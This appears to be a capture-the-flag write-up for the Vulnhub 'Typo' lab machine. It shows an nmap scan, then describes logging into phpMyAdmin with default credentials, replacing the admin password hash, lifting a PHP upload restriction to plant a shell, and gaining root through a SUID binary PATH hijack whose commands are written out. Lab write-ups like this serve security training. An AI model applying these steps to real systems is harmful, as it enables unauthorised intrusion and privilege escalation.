Let’s do another cool machine of Vulnhub from Akanksha Verma.
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Note: Set Domain Name — typo.local
Lab Setup:-
Download this machine from the link and import it into the virtual box.
Let’s start with reconnaissance.
Here is the machine welcome message and the ip.
In my case IP is 192.168.1.208
Let’s start a quick scan.
Scanning:-
In the simple scan got multiple open ports.
Here is the complete Nmap scan report
┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Typo]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.208
Nmap scan report for 192.168.1.208
Host is up (0.00031s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
| 256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_ 256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Page Not Found
8000/tcp open http Apache httpd 2.4.38
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://typo.local
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
In port 80 got nothing only the error message,
so I bind it with the typo.local, and found the simple page, with a Hello User message.
So i run a gobuster and found the admin panel of cms,
Tried with default creds but not worked.
SO I move forward with another port to find something like PHPMyAdmin because if the cms is running so without a database it can’t.
SO moving towards to another port.
In Port 8080 Found nothing only the blank page and also dirb and gobuster doesn’t give the result.
So in another port 8081 found only the hello message
SO i run dirb on port 8081 and found PHPMyAdmin
Tried with default credentials and its works.
And got the admin password hash.
But after googling it found one repo in GitHub but unable to crack the password using the online tool as well, So i decided to generate another hash and update it in the database.
From this website, I generated an argon2id hash.
After searching the way to upload shell got one deny entry in the configuration.
Let’s quickly update it. Remove the PHP entry from deny file.
Settings > Configure Installation-Wide Options > Backend > [BE][fileDenyPattern]
And upload a shell
SO we got a shell.
Now time for privilege escalation
Found apache2-restart having SUID bit.
After strings it got it is starting apache2 service with the command.
So now let’s move forward with the path variable.
www-data@typo:/$ cd /tmp
cd /tmp
www-data@typo:/tmp$ echo "/bin/bash" > service
echo "/bin/bash" > service
www-data@typo:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@typo:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@typo:/tmp$ ECHO $path
ECHO $path
bash: ECHO: command not found
www-data@typo:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@typo:/tmp$
We did all those necessary steps let’s run the apache2-restart command.
Got a Root !!
Awesome Beginner Level machine.
Happy Hacking !